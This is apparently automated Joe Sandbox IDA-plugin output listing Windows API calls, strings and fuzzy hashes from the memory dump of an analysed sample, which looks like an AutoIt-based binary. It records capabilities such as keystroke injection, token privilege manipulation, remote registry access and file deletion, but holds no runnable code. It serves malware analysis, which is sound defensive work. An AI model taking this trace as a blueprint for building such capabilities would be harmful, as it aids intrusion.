                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0044CB37
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0044CB95
                            • GetWindowLongW.USER32(?,000000F0), ref: 0044CBD6
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0044CC00
                            • SendMessageW.USER32 ref: 0044CC29
                            • _wcsncpy.LIBCMT ref: 0044CC95
                            • GetKeyState.USER32(00000011), ref: 0044CCB6
                            • GetKeyState.USER32(00000009), ref: 0044CCC3
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0044CCD9
                            • GetKeyState.USER32(00000010), ref: 0044CCE3
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0044CD0C
                            • SendMessageW.USER32 ref: 0044CD33
                            • SendMessageW.USER32(?,00001030,?,0044B348), ref: 0044CE37
                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0044CE4D
                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0044CE60
                            • SetCapture.USER32(?), ref: 0044CE69
                            • ClientToScreen.USER32(?,?), ref: 0044CECE
                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0044CEDB
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0044CEF5
                            • ReleaseCapture.USER32(?,?,?), ref: 0044CF00
                            • GetCursorPos.USER32(?), ref: 0044CF3A
                            • ScreenToClient.USER32(?,?), ref: 0044CF47
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0044CFA3
                            • SendMessageW.USER32 ref: 0044CFD1
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0044D00E
                            • SendMessageW.USER32 ref: 0044D03D
                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0044D05E
                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0044D06D
                            • GetCursorPos.USER32(?), ref: 0044D08D
                            • ScreenToClient.USER32(?,?), ref: 0044D09A
                            • GetParent.USER32(?), ref: 0044D0BA
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0044D123
                            • SendMessageW.USER32 ref: 0044D154
                            • ClientToScreen.USER32(?,?), ref: 0044D1B2
                            • TrackPopupMenuEx.USER32 ref: 0044D1E2
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0044D20C
                            • SendMessageW.USER32 ref: 0044D22F
                            • ClientToScreen.USER32(?,?), ref: 0044D281
                            • TrackPopupMenuEx.USER32 ref: 0044D2B5
                              • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                            • GetWindowLongW.USER32(?,000000F0), ref: 0044D351
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                            • String ID: @GUI_DRAGID$F$`$$pbH
                            • API String ID: 3977979337-3055454625
                            • Opcode ID: 402e66007d82c01431243262d6e656190b5a9dec19d88844a78d93592868dde8
                            • Instruction ID: 4dd6c19128316485e0d5585cf9d99fe7a3650c2f528a4a3a1772602b26ce3ba9
                            • Opcode Fuzzy Hash: 402e66007d82c01431243262d6e656190b5a9dec19d88844a78d93592868dde8
                            • Instruction Fuzzy Hash: DB42BC38605680AFE720DF24D888FABBBE5FF49310F18092EF555872A0C735E855DB5A
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memmove$_memset
                            • String ID: ]G$3c=$DEFINE$P\G$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_=
                            • API String ID: 1357608183-3568290574
                            • Opcode ID: fe7417b1afaa2420a46cd9ff2b8f7bd6dbb4b177f5145b23f13e31f93241c674
                            • Instruction ID: a7f3078e9d7e7e9acfec70d4793a9fe2b28acc5457ecb35633ad56e5742e3111
                            • Opcode Fuzzy Hash: fe7417b1afaa2420a46cd9ff2b8f7bd6dbb4b177f5145b23f13e31f93241c674
                            • Instruction Fuzzy Hash: 43939172A042199BDB25CF98D881BEDB7B1FF48310F25816BE945EB390E7749D82CB44
                            APIs
                            • GetForegroundWindow.USER32 ref: 003C48DF
                            • FindWindowW.USER32 ref: 003FD665
                            • IsIconic.USER32(?), ref: 003FD66E
                            • ShowWindow.USER32(?,00000009), ref: 003FD67B
                            • SetForegroundWindow.USER32(?), ref: 003FD685
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003FD69B
                            • GetCurrentThreadId.KERNEL32 ref: 003FD6A2
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 003FD6AE
                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 003FD6BF
                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 003FD6C7
                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 003FD6CF
                            • SetForegroundWindow.USER32(?), ref: 003FD6D2
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FD6E7
                            • keybd_event.USER32 ref: 003FD6F2
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FD6FC
                            • keybd_event.USER32 ref: 003FD701
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FD70A
                            • keybd_event.USER32 ref: 003FD70F
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FD719
                            • keybd_event.USER32 ref: 003FD71E
                            • SetForegroundWindow.USER32(?), ref: 003FD721
                            • AttachThreadInput.USER32(?,?,00000000), ref: 003FD748
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                            • String ID: Shell_TrayWnd
                            • API String ID: 4125248594-2988720461
                            • Opcode ID: a2da3384541f4de3af487ffe3c74042f73fa12a3ad70065d17d985a07d4d5100
                            • Instruction ID: 5251e4e9bca7e5a18734d9d76bbf39f44ddb751e81bf4e364f102b135c2b75d8
                            • Opcode Fuzzy Hash: a2da3384541f4de3af487ffe3c74042f73fa12a3ad70065d17d985a07d4d5100
                            • Instruction Fuzzy Hash: FA319E75A8031CBAEB216FA18C89F7F7E6DEB45B50F114035FA04EA1D1CAB05C05AAA4
                            APIs
                              • Part of subcall function 004187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041882B
                              • Part of subcall function 004187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00418858
                              • Part of subcall function 004187E1: GetLastError.KERNEL32 ref: 00418865
                            • _memset.LIBCMT ref: 00418353
                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004183A5
                            • CloseHandle.KERNEL32(?), ref: 004183B6
                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004183CD
                            • GetProcessWindowStation.USER32 ref: 004183E6
                            • SetProcessWindowStation.USER32 ref: 004183F0
                            • OpenDesktopW.USER32 ref: 0041840A
                              • Part of subcall function 004181CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00418309), ref: 004181E0
                              • Part of subcall function 004181CB: CloseHandle.KERNEL32(?), ref: 004181F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                            • String ID: $default$winsta0
                            • API String ID: 2063423040-1027155976
                            • Opcode ID: 75dea3b3619b66de1072b058158f70d125cede853ea10b3c17ef6562b9b6752e
                            • Instruction ID: 21913a149562ec6e6227179efa19c9413dec9ba668e054c14283ab68c52dd6bf
                            • Opcode Fuzzy Hash: 75dea3b3619b66de1072b058158f70d125cede853ea10b3c17ef6562b9b6752e
                            • Instruction Fuzzy Hash: 1F817971800209BFDF119FA4CC45AEF7BB9EF05304F14416EF814A62A1EB399E95DB28
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 0042C78D
                            • FindClose.KERNEL32(00000000), ref: 0042C7E1
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042C806
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042C81D
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0042C844
                            • __swprintf.LIBCMT ref: 0042C890
                            • __swprintf.LIBCMT ref: 0042C8D3
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                            • __swprintf.LIBCMT ref: 0042C927
                              • Part of subcall function 003E3698: __woutput_l.LIBCMT ref: 003E36F1
                            • __swprintf.LIBCMT ref: 0042C975
                              • Part of subcall function 003E3698: __flsbuf.LIBCMT ref: 003E3713
                              • Part of subcall function 003E3698: __flsbuf.LIBCMT ref: 003E372B
                            • __swprintf.LIBCMT ref: 0042C9C4
                            • __swprintf.LIBCMT ref: 0042CA13
                            • __swprintf.LIBCMT ref: 0042CA62
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                            • API String ID: 3953360268-2428617273
                            • Opcode ID: 30e974a00350fc722a9687781bfd2b30c60083761b6a762fdf4fa0bf2ad45636
                            • Instruction ID: 2668b4dca6016499ca23a9cd14fad4cce40dcb6f2155f486294f34801643f6e2
                            • Opcode Fuzzy Hash: 30e974a00350fc722a9687781bfd2b30c60083761b6a762fdf4fa0bf2ad45636
                            • Instruction Fuzzy Hash: 24A11DB2504344ABC701EBA4D889EAFB7ECBF94700F40491EF585CB191EA35DE08CB62
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 0042EFB6
                            • _wcscmp.LIBCMT ref: 0042EFCB
                            • _wcscmp.LIBCMT ref: 0042EFE2
                            • GetFileAttributesW.KERNEL32(?), ref: 0042EFF4
                            • SetFileAttributesW.KERNEL32(?,?), ref: 0042F00E
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0042F026
                            • FindClose.KERNEL32(00000000), ref: 0042F031
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0042F04D
                            • _wcscmp.LIBCMT ref: 0042F074
                            • _wcscmp.LIBCMT ref: 0042F08B
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042F09D
                            • SetCurrentDirectoryW.KERNEL32(00478920), ref: 0042F0BB
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0042F0C5
                            • FindClose.KERNEL32(00000000), ref: 0042F0D2
                            • FindClose.KERNEL32(00000000), ref: 0042F0E4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                            • String ID: *.*
                            • API String ID: 1803514871-438819550
                            • Opcode ID: f985a226dbb79ce75d1eb17477246ad891f024d396c31792942330f1c95cd8ef
                            • Instruction ID: a4125e6eb50d345059b68587ed21d70e873d02a04213c4c85bed180407ca7f0b
                            • Opcode Fuzzy Hash: f985a226dbb79ce75d1eb17477246ad891f024d396c31792942330f1c95cd8ef
                            • Instruction Fuzzy Hash: 873107366001286BDB109FA1EC48BEF77BCAF49360F904177E904D3191DB78DA48CA69
                            APIs
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00440953
                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0044F910,00000000,?,00000000,?,?), ref: 004409C1
                            • RegCloseKey.ADVAPI32(00000000), ref: 00440A09
                            • RegSetValueExW.ADVAPI32 ref: 00440A92
                            • RegCloseKey.ADVAPI32(?), ref: 00440DB2
                            • RegCloseKey.ADVAPI32(00000000), ref: 00440DBF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Close$ConnectCreateRegistryValue
                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                            • API String ID: 536824911-966354055
                            • Opcode ID: 99aad27bca043d3a0cb9c8c963904de671484bfeb689d2e6c428208457dd14c4
                            • Instruction ID: a783291db716719dff88b269543bece3586414758a0893c3d130e272113b9071
                            • Opcode Fuzzy Hash: 99aad27bca043d3a0cb9c8c963904de671484bfeb689d2e6c428208457dd14c4
                            • Instruction Fuzzy Hash: 5A0289756006119FDB15EF24C884E2AB7E5FF89710F05845EF98A9B3A2CB34EC05CB85
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0DF$0EF$0FF$3c=$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGF$_=
                            • API String ID: 0-2952081238
                            • Opcode ID: 5e1ec4589737f2ca293b1e40e743dec09a22f84d9f7c3d061b167f14efd2a725
                            • Instruction ID: d3e53ab73b27e5ce1d7c0a8e56b5a7fbafaefaff8a49dd90397aac117f43e5b2
                            • Opcode Fuzzy Hash: 5e1ec4589737f2ca293b1e40e743dec09a22f84d9f7c3d061b167f14efd2a725
                            • Instruction Fuzzy Hash: E1727D72E002199BDB15CF59D8817EEB7B5FF48310F14816BE919EB390EB349A81CB94
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 0042F113
                            • _wcscmp.LIBCMT ref: 0042F128
                            • _wcscmp.LIBCMT ref: 0042F13F
                              • Part of subcall function 00424385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004243A0
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0042F16E
                            • FindClose.KERNEL32(00000000), ref: 0042F179
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0042F195
                            • _wcscmp.LIBCMT ref: 0042F1BC
                            • _wcscmp.LIBCMT ref: 0042F1D3
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042F1E5
                            • SetCurrentDirectoryW.KERNEL32(00478920), ref: 0042F203
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0042F20D
                            • FindClose.KERNEL32(00000000), ref: 0042F21A
                            • FindClose.KERNEL32(00000000), ref: 0042F22C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                            • String ID: *.*
                            • API String ID: 1824444939-438819550
                            • Opcode ID: b25a8a71dbb1cdcb9ac610c21bfde1ab624af6b2404178466a886fa593ce6467
                            • Instruction ID: 52c881271ee39ff8e4b61da7a9fc8b3f063006c8726cac7ddbc4e047116f3ee6
                            • Opcode Fuzzy Hash: b25a8a71dbb1cdcb9ac610c21bfde1ab624af6b2404178466a886fa593ce6467
                            • Instruction Fuzzy Hash: F231F736600129AADB109FA0FC48AEF777C9F46320F9001B6E804A3290DB35DE49CE6C
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0042A20F
                            • __swprintf.LIBCMT ref: 0042A231
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0042A26E
                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0042A293
                            • _memset.LIBCMT ref: 0042A2B2
                            • _wcsncpy.LIBCMT ref: 0042A2EE
                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0042A323
                            • CloseHandle.KERNEL32(00000000), ref: 0042A32E
                            • RemoveDirectoryW.KERNEL32(?), ref: 0042A337
                            • CloseHandle.KERNEL32(00000000), ref: 0042A341
                            Strings
                            Similarity
                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                            • String ID: :$\$\??\%s
                            • API String ID: 2733774712-3457252023
                            • Opcode ID: 60d413996011c65864d797306ed44629edaa257333d8fc5b5617805775abd693
                            • Instruction ID: cdb4188e86bc03eafbfbc3db23b4fa6f98d863510de0c87184619d37fd43f319
                            • Opcode Fuzzy Hash: 60d413996011c65864d797306ed44629edaa257333d8fc5b5617805775abd693
                            • Instruction Fuzzy Hash: 29313775A00119ABDB21DFA0DC49FEB73BCEF89700F5041B6F908D6260E77496548B39
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00420097
                            • SetKeyboardState.USER32(?), ref: 00420102
                            • GetAsyncKeyState.USER32 ref: 00420122
                            • GetKeyState.USER32(000000A0), ref: 00420139
                            • GetAsyncKeyState.USER32 ref: 00420168
                            • GetKeyState.USER32(000000A1), ref: 00420179
                            • GetAsyncKeyState.USER32 ref: 004201A5
                            • GetKeyState.USER32(00000011), ref: 004201B3
                            • GetAsyncKeyState.USER32 ref: 004201DC
                            • GetKeyState.USER32(00000012), ref: 004201EA
                            • GetAsyncKeyState.USER32 ref: 00420213
                            • GetKeyState.USER32(0000005B), ref: 00420221
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            • Opcode ID: 83c383afdd59836301164d29e6aaa51267237924ee8d97763e13d170fbe8bc85
                            • Instruction ID: c4cab3d62ae0acb2011e75e23b11e04dd81113d3856a91b258272f9f91f90c62
                            • Opcode Fuzzy Hash: 83c383afdd59836301164d29e6aaa51267237924ee8d97763e13d170fbe8bc85
                            • Instruction Fuzzy Hash: 9651FD20B047A829FB35D7A0A8547ABBFF49F01380F88459F85C1572C3DA6C9B8CC769
                            APIs
                              • Part of subcall function 00440E1A: CharUpperBuffW.USER32(?,?), ref: 00440E31
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004404AC
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0044054B
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004405E3
                            • RegCloseKey.ADVAPI32(000000FE), ref: 00440822
                            • RegCloseKey.ADVAPI32(00000000), ref: 0044082F
                            Similarity
                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                            • String ID:
                            • API String ID: 1240663315-0
                            • Opcode ID: c7d2167169f1b16bf7520d08adbeb9ae65d9065b9536a6908ed72fc08b7384ec
                            • Instruction ID: c52401998761ff3832422955c75091e2014acbd2b300c831c7afeb3a20a5057b
                            • Opcode Fuzzy Hash: c7d2167169f1b16bf7520d08adbeb9ae65d9065b9536a6908ed72fc08b7384ec
                            • Instruction Fuzzy Hash: 39E17D31204200AFDB15DF28C885E2BBBE5FF89314F05856EF94ADB261DA34ED15CB96
                            APIs
                            Similarity
                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                            • String ID:
                            • API String ID: 1737998785-0
                            • Opcode ID: b2e92cd0d7e94a240988ceac360604447744ddfe6c78d9de0b06e610648a194d
                            • Instruction ID: a05bd03f37bae30511ff8d3213fc9bcb0df6182574c8092b9e2ca07b2f0643e3
                            • Opcode Fuzzy Hash: b2e92cd0d7e94a240988ceac360604447744ddfe6c78d9de0b06e610648a194d
                            • Instruction Fuzzy Hash: CA21D3392006109FDB01AF20EC09BAE7BA8FF49750F11806AF945DB3A1DB74AC41CB59
                            APIs
                              • Part of subcall function 003C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C4743,?,?,003C37AE,?), ref: 003C4770
                              • Part of subcall function 00424A31: GetFileAttributesW.KERNEL32(?,0042370B), ref: 00424A32
                            • FindFirstFileW.KERNEL32(?,?), ref: 004238A3
                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0042394B
                            • MoveFileW.KERNEL32 ref: 0042395E
                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0042397B
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0042399D
                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 004239B9
                            Strings
                            Similarity
                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                            • String ID: \*.*
                            • API String ID: 4002782344-1173974218
                            • Opcode ID: 76aff9a668b6ffd2c93eef1d1f3c3587347a01fdda080a4fa20a86016b878f4d
                            • Instruction ID: d80707aedc43700b4d20d4b1b18704aa05309b12cf1f9a041f7dc6fb87d2c907
                            • Opcode Fuzzy Hash: 76aff9a668b6ffd2c93eef1d1f3c3587347a01fdda080a4fa20a86016b878f4d
                            • Instruction Fuzzy Hash: 7051B37190015C9ACF12EFA0D952EEEB779AF15301FA000AEE802BB191DF396F49CB54
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0042F440
                            • Sleep.KERNEL32(0000000A), ref: 0042F470
                            • _wcscmp.LIBCMT ref: 0042F484
                            • _wcscmp.LIBCMT ref: 0042F49F
                            • FindNextFileW.KERNEL32(?,?), ref: 0042F53D
                            • FindClose.KERNEL32(00000000), ref: 0042F553
                            Strings
                            Similarity
                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                            • String ID: *.*
                            • API String ID: 713712311-438819550
                            • Opcode ID: 7f970f32c639d1c501dacafc209e44f87ed1037a45efeee3d477a98108067c42
                            • Instruction ID: 29953b1e9b9bee43e1abbe03e015557b0691a928a64fe3fc63fc690f6caf5bd6
                            • Opcode Fuzzy Hash: 7f970f32c639d1c501dacafc209e44f87ed1037a45efeee3d477a98108067c42
                            • Instruction Fuzzy Hash: 93417D7190022AABCF11DF64DC49AEEBBB4FF15310F90417AE815A7291DB349E89CF54
                            Strings
                            Similarity
                            • API ID: __itow__swprintf
                            • String ID: 3c=$_=
                            • API String ID: 674341424-3170935384
                            • Opcode ID: e208f1ad5dd53972e8a1db9feafc956848ec758d02b60d0350f80f6e1bc0b484
                            • Instruction ID: 32f2ad5de5588279761903429b399ca8e097328ec218085e7ab9294d06856bc5
                            • Opcode Fuzzy Hash: e208f1ad5dd53972e8a1db9feafc956848ec758d02b60d0350f80f6e1bc0b484
                            • Instruction Fuzzy Hash: FA227C726083019FD716DF24D881B6AB7E4AF84314F01492EF89A9B391DB75EE44CB93
                            APIs
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 4bd08d8e7ca52604f0369fb616c17e7b8892979e5f700a938ddbf4867be78f67
                            • Instruction ID: 99c299d71a1a2df665c6e2dac84610f1c818eb1162bbe9a7caa68dac3fd8a26d
                            • Opcode Fuzzy Hash: 4bd08d8e7ca52604f0369fb616c17e7b8892979e5f700a938ddbf4867be78f67
                            • Instruction Fuzzy Hash: D0129C71A00619EFDF05DFA5D981AEEB7B5FF48300F10452AE406EB290EB79AD90CB54
                            APIs
                              • Part of subcall function 003C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C4743,?,?,003C37AE,?), ref: 003C4770
                              • Part of subcall function 00424A31: GetFileAttributesW.KERNEL32(?,0042370B), ref: 00424A32
                            • FindFirstFileW.KERNEL32(?,?), ref: 00423B89
                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00423BD9
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00423BEA
